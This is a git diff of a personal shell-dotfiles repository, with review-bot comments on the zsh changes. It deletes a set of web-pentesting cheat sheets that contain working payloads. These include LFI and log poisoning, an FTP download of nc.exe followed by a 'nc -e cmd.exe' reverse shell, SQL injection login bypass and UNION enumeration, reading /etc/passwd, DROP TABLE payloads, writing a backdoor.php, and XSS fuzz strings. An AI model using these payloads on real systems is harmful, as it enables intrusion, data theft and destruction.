@@ -1,41 +0,0 @@ - -Local File Inclusion -==================== - -The %00 make php 5.3 and below ignore everything after that. - -Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00 -...then let's add code to the access log :) -~# nc 192.168.1.1 80 - -...and use it -http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00 -...or php shell on linux:) -&3 2>&3");?> -...finally send the requests to nc and exploit: - -# Windows FTP upload -echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt -nc.exe -e cmd.exe 192.168.1.1  31337 - -- - - - - - - - - ftp.txt'); ?> -> ftp.txt'); ?> -> ftp.txt'); ?> -> ftp.txt'); ?> -> ftp.txt'); ?> -> ftp.txt'); ?> - - - - - - - - - -Remote file Inclusion -===================== -Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00 -Note: the login.txt contains - diff --git a/tools/v3das/web_fuzz_strings.txt b/tools/v3das/web_fuzz_strings.txt deleted file mode 100755 index 72bb7c3..0000000 --- a/tools/v3das/web_fuzz_strings.txt +++ /dev/null @@ -1,14 +0,0 @@ - -XSS locator -';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> - - -XSS locator 2 -'';!--"=&{()} - - - - -Other fuzzing char list -><>)()}{}][]'"`;--..\/\\//../~=-1!--?||*&&%00%0a%0d\r\n#><>}{} - diff --git a/tools/v3das/web_injection_php.txt b/tools/v3das/web_injection_php.txt deleted file mode 100755 index 72dd935..0000000 --- a/tools/v3das/web_injection_php.txt +++ /dev/null @@ -1,11 +0,0 @@ - -PHP command injection -===================== - -There are just some ideas. - - - - - - 
diff --git a/tools/v3das/web_injection_sqli.txt b/tools/v3das/web_injection_sqli.txt deleted file mode 100755 index d459f64..0000000 --- a/tools/v3das/web_injection_sqli.txt +++ /dev/null @@ -1,43 +0,0 @@ - -SQLi notes -========== - -Login bypass -any' or 1=1 limit 1 ;# -' OR '1' = '1 / ' OR '1' = '1 -;# ;-- # - - -?id=737 order by 6 --> Testing max columns -?id=737 union select all 1,2,3,4,5,6 --> Testing max columns in database -?id=737 union select all 1,2,3,4,@@version,6 --> Version enumeration, commands to run or exploits? -?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables --> Table enumeration -?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user' --> Column enumeration -?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users --> After knowing about "users" pull out the info - - -More examples - -x%') # -x%') or 1=1 # -x%') order by 4 # -x%') union select all 4 # -x%') union select all 1,2,3@@version # -x%') and 1=1 # - -x%') and UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) # -x%') and drop table if exists customers # -x%') and create database test # -x%') ; DROP ALL TABLES; # - -@@hostname - -wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value" - - -Adding backdor.php -?id=737 union select all 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php' - -Getting a shell with php execute -192.168.3.1/comment.php?id=737 union select all 1,2,3,4," ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php' - diff --git a/tools/v3das/web_xss_cookie_stealing.txt b/tools/v3das/web_xss_cookie_stealing.txt deleted file mode 100755 index e494f29..0000000 --- a/tools/v3das/web_xss_cookie_stealing.txt +++ /dev/null @@ -1,3 +0,0 @@ - - - diff --git a/zsh_files/.zsh b/zsh_files/.zsh deleted file mode 100755 index e69de29..0000000 
diff --git a/zsh_files/.zshrc b/zsh_files/.zshrc deleted file mode 100755 index c76c90f..0000000 --- a/zsh_files/.zshrc +++ /dev/null @@ -1,3 +0,0 @@ -source ~/.cryptozsh/general.zsh -source ~/.cryptozsh/crypto.zsh -source ~/.cryptozsh/vedas.zsh diff --git a/zsh_files/crypto.zsh b/zsh_files/crypto.zsh index 86d9f13..126415a 100755 --- a/zsh_files/crypto.zsh +++ b/zsh_files/crypto.zsh @@ -1,3 +1,5 @@ +# If needed, run locally: https://github.com/gchq/CyberChef + # Create a temporary file random name and open it with vi function tmp { curran=$RANDOM$RANDOM @@ -5,25 +7,12 @@ function tmp { vi /tmp/$curran } - -# HTTP and HTTPS response check -function chkhttpz { - # http response checks from a given host / port - echo "HTTP responses" - wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/" - - echo "\nHTTPS responses" - wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/" -} - - # Show certificate of website function chkcrt { # check ssl certificate of a server openssl s_client -showcerts -connect $1:$2 } - # Quickly get random characters function rnd { # get some random characters diff --git a/zsh_files/gen6.zsh b/zsh_files/gen6.zsh new file mode 100755 index 0000000..0aad298 --- /dev/null +++ b/zsh_files/gen6.zsh 
@@ -0,0 +1,47 @@
+# Create a temporary file random name and open it with vi
+function tmp {
+ curran=$RANDOM$RANDOM
+ echo "Temporary file name: /tmp/$curran"
+ vi /tmp/$curran
+}
+
+
+# HTTP and HTTPS response check
+function chkhttpz {
+ # http response checks from a given host / port
+ echo "HTTP responses"
+ wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/"
+
+ echo "\nHTTPS responses"
+ wget --spider -S "https://$1:$2/" 2>&1 | grep "HTTP/"
+}
+
+# HTTP and HTTPS response check
+function chkgen6 {
+ echo "\nHTTPS responses for Gen6 App"
+ wget --spider -S "https://gen6.app/" 2>&1 | grep "HTTP/"
+
+ echo "HTTP responses Gen6 LinkFree"
+ wget --spider -S "http://link.g6.network/" 2>&1 | grep "HTTP/"
+
+ echo "HTTP responses Gen6 LinkFree"
+ timeout 2 websocat -1 wss://gen6.app/node -v 2>&1 | timeout 2 grep "Connected"
+}
+
+
+# Show certificate of website
+function chkcrt {
+ # check ssl certificate of a server
+ openssl s_client -showcerts -connect $1:$2
+}
+
+
+# Quickly get random characters
+function rnd {
+ # get some random characters
+ cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-8};echo;
+ cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-16};echo;
+ cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-32};echo;
+ cat /dev/urandom | tr -dc _A-Z-a-z-0-9.,! | head -c${1:-64};echo;
+}
+
diff --git a/zsh_files/general.zsh b/zsh_files/general.zsh
index 713d228..88ae75b 100755
--- a/zsh_files/general.zsh
+++ b/zsh_files/general.zsh
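Review bot: `tmp` builds its path from `$RANDOM$RANDOM` under world-writable `/tmp`, so the name is guessable and nothing creates the file atomically; another local user could pre-create that path, or a symlink at it, before `vi` opens it. Let `mktemp` create the file with owner-only permissions instead: `curran=$(mktemp)`, then print and open `"$curran"` rather than `/tmp/$curran`. Separately, `tmp`, `chkcrt` and `rnd` still appear as context in crypto.zsh, and the new zshrc sources crypto.zsh before gen6.zsh, so the copies added here silently override the earlier ones; keeping a single definition would avoid the two drifting apart. In `chkcrt`, `$1:$2` is unquoted and the call would read better as `openssl s_client -showcerts -connect "$1:$2"`.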
@@ -1,19 +1,24 @@ #Aliases alias py='python3' -alias bcp='python3 ~/.cryptozsh_tools/bcp.py' +alias python='python3' +alias ratesx='curl rate.sx' alias hash-identifier='python3 ~/.cryptozsh_tools/hash-identifier.py' # Add yours :) - # Menuselect and requirements for v3das (changing this might break v3das) autoload -U compinit compinit zstyle ':completion:*' menu select=2 +# Make ctrl+backwards work +bindkey "^[[1;5C" emacs-forward-word +bindkey "^[[1;5D" emacs-backward-word # History -# Off - +HISTFILE=~/.zsh_history +HISTSIZE=69 +SAVEHIST=50 +setopt appendhistory # Opts setopt AUTO_CD @@ -67,10 +72,9 @@ function git_prompt_info { PROMPT='%{$fg[yellow]%}$(whoami)%{$reset_color%} %~%<< $(git_prompt_info) ${PR_BOLD_WHITE}>%{${reset_color}%} ' - # btc price check on coindesk function btcp { - . torsocks on # Turn on for extra security + #. torsocks on # Turn on for extra security echo "BTC price on CoinDesk " curl -s https://api.coindesk.com/v1/bpi/currentprice.json | cut -d '"' -f 38 } diff --git a/zsh_files/hacking.zsh b/zsh_files/hacking.zsh deleted file mode 100755 index e894282..0000000 --- a/zsh_files/hacking.zsh +++ /dev/null @@ -1 +0,0 @@ -#TBA diff --git a/zsh_files/vedas.zsh b/zsh_files/vedas.zsh deleted file mode 100755 index 2e63cde..0000000 --- a/zsh_files/vedas.zsh +++ /dev/null @@ -1,25 +0,0 @@ -fpath=(~/.cryptozsh_tools/v3das $fpath) - -# Requirements -#autoload -U compinit -#compinit -#zstyle ':completion:*' menu select=2 - -function nls { - echo "\nYou can get help from the following topics:\n" - for f in ~/.cryptozsh_tools/v3das/* ; do - echo $f | rev | cut -d'/' -f1 | rev | cut -d'.' -f1 | egrep -v "^_n" - done - echo "" -} - - -function n { - # query knowledgebase, use tab after n - if [ -d "~/.cryptozsh_tools/v3das" ] - then - echo "knowledge base / notes are missing" - else - cat ~/.cryptozsh_tools/v3das/$1 - fi -} diff --git a/zsh_files/zshrc b/zsh_files/zshrc new file mode 100755 index 0000000..40f911c --- /dev/null +++ b/zsh_files/zshrc 
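Review bot: The `# History` block switches on-disk history back on (`HISTFILE=~/.zsh_history`, `setopt appendhistory`) where the previous version had it off, so anything typed or pasted at the prompt, including keys or passphrases passed as arguments, is now written to disk. If history is wanted, add `setopt HIST_IGNORE_SPACE` next to `appendhistory` so that a command typed with a leading space stays out of the file, and say so in a comment above the block. In the same hunk, `alias ratesx='curl rate.sx'` gives curl no scheme, so the request goes out over plain HTTP; `alias ratesx='curl https://rate.sx'` would keep the lookup encrypted, assuming the service answers on HTTPS.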
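Review bot: In `btcp`, the `. torsocks on` line is now commented out but keeps its trailing "Turn on for extra security" text, which reads as if Tor routing were still part of the function. With the line disabled, the `curl` to api.coindesk.com leaves directly from the user's own address. Either drop the dead line or make the opt-in explicit, for example `# optional: run '. torsocks on' beforehand to send this lookup over Tor`.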
@@ -0,0 +1,3 @@
+source ~/.gen6zsh/general.zsh
+source ~/.gen6zsh/crypto.zsh
+source ~/.gen6zsh/gen6.zsh